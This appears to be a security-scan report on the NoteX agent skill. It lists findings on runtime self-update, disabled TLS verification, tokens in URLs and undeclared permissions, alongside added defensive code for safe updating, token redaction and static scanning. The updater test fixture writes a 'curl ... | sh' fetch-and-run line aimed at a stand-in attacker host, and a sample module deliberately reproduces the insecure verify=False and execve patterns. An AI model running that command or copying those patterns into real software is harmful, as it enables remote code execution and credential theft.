Notex Skills

Security checks across malware telemetry and agentic risk

Overview

The NoteX skill mostly matches its stated product purpose, but it checks for remote code updates at runtime and can install them, and it makes its HTTPS requests with TLS certificate verification disabled.

Review before installing. Use it only if you trust the publisher, the NoteX service, and the cms-auth-skills dependency. Prefer a version that removes runtime self-update, enables TLS certificate verification, relies on platform-managed signed updates, and clearly warns about tokenized URLs, full-content uploads, OPS user-activity access, and local cache files.

SkillSpector

By NVIDIA
Vulnerability Patterns
  • Data Exfiltration: External Transmission, Env Variable Harvesting, File System Enumeration
  • Excessive Agency: Unrestricted Tool Access, Autonomous Decision Making, Scope Creep
  • Behavioral AST: exec() Call, eval() Call, Dynamic Import
  • MCP Least Privilege: Underdeclared Capability, Wildcard Permission, Missing Permission Declaration
  • MCP Tool Poisoning: Hidden Instructions, Unicode Deception, Parameter Description Injection
Findings (31)

subprocess module call

Medium
Category
Dangerous Code Execution
Content
import subprocess
from sys import platform  # the excerpt compares a bare `platform`; this import is assumed


def open_in_browser(url):  # enclosing function name is not shown in the excerpt; assumed
    # Hands the URL to the platform's default handler; on Windows it goes through cmd.exe.
    if platform == "darwin":
        subprocess.Popen(["open", url], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
    elif platform == "win32":
        subprocess.Popen(["cmd", "/c", "start", "", url], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
    else:
        subprocess.Popen(["xdg-open", url], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
    return True
Confidence
79% confidence
Finding
subprocess.Popen(["cmd", "/c", "start", "", url], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)

os.system() or os exec-family call

High
Category
Dangerous Code Execution
Content
import os
import sys

env = os.environ.copy()
env[SKIP_ENV_NAME] = "1"  # SKIP_ENV_NAME and script_path are defined outside this excerpt
argv = [sys.executable, script_path, *sys.argv[1:]]
os.execve(sys.executable, argv, env)  # replaces the current process with the re-launched script


def maybe_self_update() -> dict:
Confidence
91% confidence
Finding
os.execve(sys.executable, argv, env)

Lp3

Medium
Category
MCP Least Privilege
Confidence
88% confidence
Finding
The skill declares no permissions, yet its documented behavior clearly requires sensitive capabilities including network access, shell execution, environment access, and file read/write. That mismatch weakens security review and enforcement because operators and policy engines cannot accurately reason about what the skill is allowed to do. In this context, the risk is elevated because the skill handles authentication flows, token-bearing links, script execution, and package installation commands.

Description-Behavior Mismatch

High
Confidence
94% confidence
Finding
The README describes an OPS analytics and monitoring capability that is materially broader than the declared NoteX content/notebook/source/login-gateway scope. Scope drift like this is dangerous because it can introduce privileged operational data access and person-level monitoring features that reviewers, deployers, and users would not reasonably expect from the manifest, undermining least privilege and governance controls.

Context-Inappropriate Capability

Medium
Confidence
91% confidence
Finding
The documented ability to retrieve named users' activity history, profile details, and watchlist status enables employee/user surveillance and access to potentially sensitive behavioral data without a clear purpose limitation in the skill metadata. In the context of a broadly described NoteX skill, this makes unauthorized or excessive personal data access more likely and harder to detect as abnormal.

Context-Inappropriate Capability

Medium
Confidence
90% confidence
Finding
A fallback custom-query capability, even with a whitelist and row cap, significantly expands what the agent can retrieve beyond curated read-only analytics functions. This is dangerous because it can bypass intended abstraction boundaries, expose unexpected sensitive columns or tables, and make policy enforcement dependent on prompt discipline rather than hard technical controls.

Intent-Code Divergence

Low
Confidence
99% confidence
Finding
The helper disables TLS certificate verification for all HTTPS requests while also suppressing the warning, making man-in-the-middle interception feasible. Because this script transmits and later appends authentication tokens to URLs, an attacker on the network path could steal credentials or tamper with API responses.

Context-Inappropriate Capability

Medium
Confidence
93% confidence
Finding
A read-only notebook retrieval script should not modify itself or fetch code updates at runtime. In a skill context, self-update expands the trust boundary from a local utility into arbitrary code acquisition/execution, creating a supply-chain and persistence risk unrelated to the stated functionality.

Context-Inappropriate Capability

Medium
Confidence
91% confidence
Finding
The script executes an external authentication helper via subprocess, which adds code-execution capability beyond simple read operations. Even if intended for SSO/token acquisition, this means the script's behavior depends on another on-disk script that could be replaced, tampered with, or behave unexpectedly in an agent environment.

Context-Inappropriate Capability

Medium
Confidence
90% confidence
Finding
The notebook-writing script reaches outside its stated purpose and executes an external auth skill to obtain an access token, creating a powerful trust boundary crossing. In this skill ecosystem, that is dangerous because a swapped or tampered login.py can execute arbitrary code and return stolen or forged credentials while appearing to perform normal authentication.

Description-Behavior Mismatch

High
Confidence
98% confidence
Finding
The file introduces a shared self-update mechanism that downloads archives, replaces local files, and restarts execution, none of which are justified by the manifest's stated NoteX business functions. That mismatch matters because it hides a powerful code-loading capability inside a content/notes skill, increasing supply-chain and remote execution risk.

Context-Inappropriate Capability

High
Confidence
99% confidence
Finding
This block implements end-to-end self-updating: remote metadata lookup, ZIP download, extraction, replacement of the installed skill, and exec-based restart. Because the downloaded code becomes the next running version, any compromise of the registry, download endpoint, or network path can result in arbitrary code execution with the skill's privileges.

Context-Inappropriate Capability

Medium
Confidence
93% confidence
Finding
The script imports and later invokes a self-update capability unrelated to index synchronization, expanding its privilege and trust boundary beyond the stated function. In an agent skill context, self-updating code can silently change behavior at runtime, introduce unreviewed logic, or fetch attacker-controlled modifications if the update mechanism is compromised.
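The self-update findings above (runtime self-update in a read-only retrieval script, the shared download/replace/restart mechanism, the end-to-end ZIP install, and the index-sync script that imports it) share one failure mode: bytes from the network become the next running version without any check the skill itself controls. The example below is added here and is not the skill's own updater; it shows the two checks a minimal updater must perform before an archive touches disk: pin the archive to a digest obtained out of band (assumed here to come from a signed release manifest rather than the download endpoint) and refuse archive entries that escape the install directory or are symlinks. The archives, the `notex/` file names and the `attacker.invalid` host are constructed for the example.

```python
import hashlib
import hmac
import io
import tempfile
import zipfile
from pathlib import Path, PureWindowsPath


class UpdateRejected(Exception):
    """Raised when a downloaded update fails an integrity or safety check."""


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def verify_archive_digest(archive: bytes, expected_sha256: str) -> None:
    """Pin the archive to a digest obtained out of band (assumed: a signed release
    manifest). A digest served next to the ZIP by the same endpoint only proves the
    download was not corrupted, not that the publisher produced it."""
    actual = sha256_hex(archive)
    if not hmac.compare_digest(actual, expected_sha256.lower()):
        raise UpdateRejected(f"digest mismatch: expected {expected_sha256}, got {actual}")


def safe_members(zf: zipfile.ZipFile, dest: Path) -> list[zipfile.ZipInfo]:
    """Reject zip-slip entries (absolute paths, '..' escapes) and symlinks.
    ZipFile.extract() silently rewrites such names; rejecting the whole archive
    makes a tampered update visible instead of quietly installed."""
    dest = dest.resolve()
    members = []
    for info in zf.infolist():
        name = info.filename
        if name.startswith(("/", "\\")) or PureWindowsPath(name).drive:
            raise UpdateRejected(f"absolute path in archive: {name}")
        target = (dest / name).resolve()
        if target != dest and dest not in target.parents:
            raise UpdateRejected(f"path escapes install dir: {name}")
        if (info.external_attr >> 16) & 0o170000 == 0o120000:  # Unix mode bits: symlink
            raise UpdateRejected(f"symlink in archive: {name}")
        members.append(info)
    return members


def stage_update(archive: bytes, expected_sha256: str, dest: Path) -> list[str]:
    """Verify, then extract into `dest`; returns the extracted names. Nothing is
    executed here: re-launching (the page's execve step) stays a separate decision."""
    verify_archive_digest(archive, expected_sha256)
    with zipfile.ZipFile(io.BytesIO(archive)) as zf:
        members = safe_members(zf, dest)  # validate every entry before writing any
        for info in members:
            zf.extract(info, dest)
    return [m.filename for m in members]


def build_zip(entries: dict[str, bytes]) -> bytes:
    """In-memory archive builder for the constructed sample releases below."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, data in entries.items():
            zf.writestr(name, data)
    return buf.getvalue()


GOOD_ARCHIVE = build_zip({"notex/__init__.py": b"", "notex/client.py": b"VERSION = '1.1'\n"})
GOOD_DIGEST = sha256_hex(GOOD_ARCHIVE)
# Zip-slip archive: the entry name climbs out of the install directory.
EVIL_ARCHIVE = build_zip({"../../.bashrc": b"curl http://attacker.invalid/x | sh\n"})


def try_stage(archive: bytes, digest: str, dest: Path) -> str:
    try:
        stage_update(archive, digest, dest)
        return "accepted"
    except UpdateRejected as exc:
        return "rejected: " + str(exc).split(":")[0]


def demo() -> dict[str, str]:
    """Three cases in a throwaway directory: a genuine release, the same bytes
    against the wrong pinned digest, and a zip-slip archive whose digest does
    match (the attacker controls both), which only the path check stops."""
    with tempfile.TemporaryDirectory() as tmp:
        dest = Path(tmp) / "skill"
        dest.mkdir()
        outcome = {
            "genuine": try_stage(GOOD_ARCHIVE, GOOD_DIGEST, dest),
            "tampered_bytes": try_stage(GOOD_ARCHIVE, "0" * 64, dest),
            "zip_slip": try_stage(EVIL_ARCHIVE, sha256_hex(EVIL_ARCHIVE), dest),
            "installed_version": (dest / "notex" / "client.py").read_text(),
        }
    return outcome
```

Calling `demo()` returns `accepted` for the genuine archive, `rejected: digest mismatch` for the tampered bytes, and `rejected: path escapes install dir` for the zip-slip archive. The digest check on its own does not stop the third case, which is why the entry validation runs over the whole archive before a single file is written; whether to re-launch afterwards is left to the caller rather than done implicitly with `execve`.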

Missing User Warnings

High
Confidence
95% confidence
Finding
The skill explicitly instructs the agent to generate and return an authenticated URL containing a live access token in the query string. Query-string tokens are highly exposed through chat transcripts, browser history, logs, screenshots, referrer leakage, and copy/paste sharing, so the absence of a prominent warning or safer delivery mechanism creates a real credential exposure risk.

Missing User Warnings

Medium
Confidence
88% confidence
Finding
The persona explicitly advertises access to user behavior, operational indicators, and alerts, including individual history, without any accompanying privacy notice, role restriction, or disclosure of monitoring sensitivity. That omission increases the chance that operators will use the skill for person-level surveillance or data access without understanding the compliance and confidentiality implications.

Missing User Warnings

Medium
Confidence
90% confidence
Finding
Providing example triggers for looking up a named individual's recent operations and logs normalizes person-level monitoring without warning about authorization, privacy, or audit sensitivity. This is dangerous because examples shape operator behavior and can encourage routine access to detailed user activity that may be unnecessary or inappropriate.

Missing User Warnings

Medium
Confidence
92% confidence
Finding
The README states that full query traces and results are recorded for audit, but does not clearly disclose this retention to users or limit what is stored. Logging both prompts and returned data can create a secondary repository of sensitive operational and personal information, increasing breach impact and insider access risk.

Missing User Warnings

Medium
Confidence
93% confidence
Finding
The skill explicitly instructs the agent to persist fetched notebook/source indexes to a local cache file, and the indexed data contains user-scoped resource identifiers and names. Even if limited to IDs and names, local persistence increases exposure through unauthorized local access, cross-user leakage, stale sensitive metadata retention, and lack of user awareness or consent about data being stored beyond the live request.

Missing User Warnings

Medium
Confidence
96% confidence
Finding
The API explicitly requires transmitting complete original source text for all materials, but provides no guidance on data minimization, privacy review, consent, or handling of sensitive content. In a content-generation gateway, this increases the likelihood that users or integrating agents send confidential, personal, or regulated data to the service unnecessarily, creating privacy and compliance exposure.

Missing User Warnings

Low
Confidence
87% confidence
Finding
The documentation tells clients to send an `access-token` header but gives no warning about secure storage, redaction in logs, or avoiding exposure in examples and error traces. While this is common in API docs, for an agent skill that may be automated and chained through tools, missing credential-handling guidance raises the chance of accidental token leakage.

Missing User Warnings

Medium
Confidence
92% confidence
Finding
The documentation explicitly requires uploading complete, unredacted source content together with token-authenticated access, but provides no warning, minimization guidance, or handling constraints for sensitive data. In a notebook/content-ingestion skill, this increases the likelihood that users or agents will send PII, credentials, confidential business data, or copyrighted material wholesale into the service, creating avoidable privacy and data-governance risk.

Missing User Warnings

High
Confidence
95% confidence
Finding
The document explicitly defines an output format that embeds an access token directly in a URL and says the module is allowed to return that full authorization URL. Token-in-URL designs are highly sensitive because URLs can be exposed through logs, browser history, referer headers, screenshots, chat transcripts, and analytics systems, enabling unauthorized reuse of the bearer token.

Missing User Warnings

Medium
Confidence
94% confidence
Finding
The documentation explicitly permits returning a full homepage URL containing an authentication token, but it does not warn that the link itself is a bearer credential that can be leaked via logs, browser history, chat transcripts, referrer headers, screenshots, or copy/paste sharing. Because possession of the URL may be sufficient to authenticate as the user, documenting this pattern without strong handling restrictions increases the chance of credential disclosure and session compromise.
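The token-in-URL and `access-token` header findings above (the query-string link the agent is told to return, the undocumented header handling, and the homepage URL format) all come down to the same control: treat the link as a bearer credential and strip the secret before anything is logged, echoed into a chat transcript, or cached. The following is an added example, not code from the NoteX skill or from SkillSpector. The parameter names in `TOKEN_PARAMS`, the header aliases beyond `access-token`, and the sample log lines are assumptions constructed for the example, since the page does not show the actual parameter name.

```python
import re
from urllib.parse import parse_qsl, urlencode, urlsplit, urlunsplit

# Query parameters treated as bearer credentials. The page only says the link
# carries an "access token" in the query string; these names are assumed.
TOKEN_PARAMS = frozenset({"access_token", "access-token", "token", "auth_token"})
# Header names whose values must never reach a log or transcript. The page
# documents `access-token`; the other two are common aliases, assumed here.
TOKEN_HEADERS = ("access-token", "authorization", "x-access-token")
REDACTED = "[REDACTED]"

_URL_RE = re.compile(r"https?://[^\s\"'<>]+")
_HEADER_RE = re.compile(
    r"(?i)\b(" + "|".join(re.escape(h) for h in TOKEN_HEADERS) + r")\s*:\s*\S+"
)


def url_bearer_params(url: str) -> list[str]:
    """Names of query parameters in `url` that carry a token (empty if none)."""
    pairs = parse_qsl(urlsplit(url).query, keep_blank_values=True)
    return [k for k, _ in pairs if k.lower() in TOKEN_PARAMS]


def redact_url(url: str) -> str:
    """Replace token values in the query string, leaving everything else intact."""
    parts = urlsplit(url)
    pairs = parse_qsl(parts.query, keep_blank_values=True)
    if not any(k.lower() in TOKEN_PARAMS for k, _ in pairs):
        return url  # nothing to do: do not re-encode an innocent URL
    safe = [(k, REDACTED if k.lower() in TOKEN_PARAMS else v) for k, v in pairs]
    return urlunsplit(parts._replace(query=urlencode(safe, safe="[]")))


def redact_log_line(line: str) -> str:
    """Redact token-bearing URLs and credential headers in one log line."""
    line = _URL_RE.sub(lambda m: redact_url(m.group(0)), line)
    return _HEADER_RE.sub(lambda m: f"{m.group(1)}: {REDACTED}", line)


def redact_transcript(text: str) -> str:
    """Apply redact_log_line to every line of a transcript or log excerpt."""
    return "\n".join(redact_log_line(line) for line in text.splitlines())


def deliverable_to_chat(url: str) -> bool:
    """Gate for an agent: a URL may be returned to the user only if it carries no token."""
    return not url_bearer_params(url)


# Constructed sample log lines (not real NoteX traffic) mirroring the findings:
# a tokenized homepage link, a header dump, and an innocent paginated request.
SAMPLE_LOG = """\
2024-05-01T10:00:00Z GET https://notex.example.com/home?access_token=abc123&lang=en 200
2024-05-01T10:00:01Z request headers: access-token: abc123 user-agent: notex-skill/1.0
2024-05-01T10:00:02Z GET https://notex.example.com/notebooks?page=2 200
"""
```

`deliverable_to_chat` is the check to run before an agent returns any URL the service hands back; `redact_transcript` is the filter to put in front of the audit log the README describes. Redaction happens on the query string rather than by blanket regex so that a URL without a token is returned byte-for-byte unchanged.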

Missing User Warnings

Medium
Confidence
92% confidence
Finding
This documentation describes an authenticated external AI chat endpoint that accepts arbitrary user messages but provides no warning about sending potentially sensitive user input to a remote service. In a skill-routing gateway context, operators or downstream agents may assume prompts are local/internal and inadvertently transmit secrets, personal data, or regulated business information to the service.

Missing User Warnings

High
Confidence
99% confidence
Finding
HTTPS requests are made with verify=False while transmitting an access token and potentially sensitive notebook/source data, and certificate warnings are suppressed. This enables man-in-the-middle attacks to intercept credentials or alter API responses, which is especially dangerous in an agent skill handling authenticated content retrieval.
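Two of the findings on this page are mechanically checkable from source: the missing permission declaration (capabilities the code actually uses versus capabilities the manifest declares, the Lp3 finding) and the `verify=False` / suppressed-warning pattern (the intent-code divergence and the finding directly above). The AST walker below is an added example, not SkillSpector's detector and not NoteX code. The capability vocabulary (`shell_execution`, `network`, and so on) is this example's own, and the two sample modules are constructed to mirror the excerpts on this page: one with the findings present, one with `verify` pointed at a CA bundle instead.

```python
import ast

# Capability implied by an import or by a module.attribute reference. These
# mappings are assumptions of this example, not the scanner's real rule set.
MODULE_CAPS = {
    "subprocess": "shell_execution",
    "requests": "network",
    "urllib": "network",
    "urllib3": "network",
    "socket": "network",
    "zipfile": "archive_extraction",
}
ATTR_CAPS = {
    ("os", "execve"): "process_replacement",
    ("os", "execv"): "process_replacement",
    ("os", "system"): "shell_execution",
    ("os", "environ"): "environment_access",
    ("subprocess", "Popen"): "shell_execution",
    ("subprocess", "run"): "shell_execution",
}


class SkillScanner(ast.NodeVisitor):
    def __init__(self) -> None:
        self.capabilities: set[str] = set()
        self.issues: list[str] = []
        self._aliases: dict[str, str] = {}  # local name -> module root

    def visit_Import(self, node: ast.Import) -> None:
        for alias in node.names:
            root = alias.name.split(".")[0]
            self._aliases[alias.asname or root] = root
            if root in MODULE_CAPS:
                self.capabilities.add(MODULE_CAPS[root])
        self.generic_visit(node)

    def visit_ImportFrom(self, node: ast.ImportFrom) -> None:
        root = (node.module or "").split(".")[0]
        if root in MODULE_CAPS:
            self.capabilities.add(MODULE_CAPS[root])
        for alias in node.names:
            cap = ATTR_CAPS.get((root, alias.name))
            if cap:
                self.capabilities.add(cap)
        self.generic_visit(node)

    def visit_Attribute(self, node: ast.Attribute) -> None:
        if isinstance(node.value, ast.Name):
            module = self._aliases.get(node.value.id, node.value.id)
            cap = ATTR_CAPS.get((module, node.attr))
            if cap:
                self.capabilities.add(cap)
        self.generic_visit(node)

    def visit_Call(self, node: ast.Call) -> None:
        func = node.func
        if isinstance(func, ast.Attribute):
            # requests.get(..., verify=False) or session.get(..., verify=False)
            for kw in node.keywords:
                if kw.arg == "verify" and isinstance(kw.value, ast.Constant) and kw.value.value is False:
                    self.issues.append(f"line {node.lineno}: TLS verification disabled (verify=False)")
            if func.attr == "disable_warnings":
                self.issues.append(f"line {node.lineno}: TLS warnings suppressed ({ast.unparse(func)})")
        elif isinstance(func, ast.Name) and func.id == "open":
            self.capabilities.add("file_io")
        self.generic_visit(node)


def scan_source(source: str) -> tuple[set[str], list[str]]:
    """Return (capabilities used, TLS issues) for one Python module's source."""
    scanner = SkillScanner()
    scanner.visit(ast.parse(source))
    return scanner.capabilities, scanner.issues


def undeclared_capabilities(source: str, declared: set[str]) -> set[str]:
    """Capabilities the code exercises that the skill manifest does not declare."""
    used, _ = scan_source(source)
    return used - declared


# Constructed sample modelled on the excerpts in this report (not NoteX's code).
VULNERABLE = '''
import os, sys, subprocess
import requests, urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

def fetch(url, token):
    return requests.get(url, headers={"access-token": token}, verify=False)

def restart(script_path):
    env = os.environ.copy()
    os.execve(sys.executable, [sys.executable, script_path], env)
'''

# Hardened counterpart: verification left on, pointed at a CA bundle (assumed path).
HARDENED = '''
import requests

def fetch(url, token, ca_bundle="/etc/ssl/certs/ca-certificates.crt"):
    return requests.get(url, headers={"access-token": token}, verify=ca_bundle, timeout=30)
'''
```

Against `VULNERABLE` with an empty declared set (the page's situation: no permissions declared), `undeclared_capabilities` reports shell execution, network, environment access and process replacement, and `scan_source` lists the `disable_warnings` call and the `verify=False` keyword with their line numbers; `HARDENED` yields only `network` and no issues. The walker tracks import aliases so `import subprocess as sp; sp.Popen(...)` is still attributed to `subprocess`.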

VirusTotal

66/66 vendors reported this skill as clean.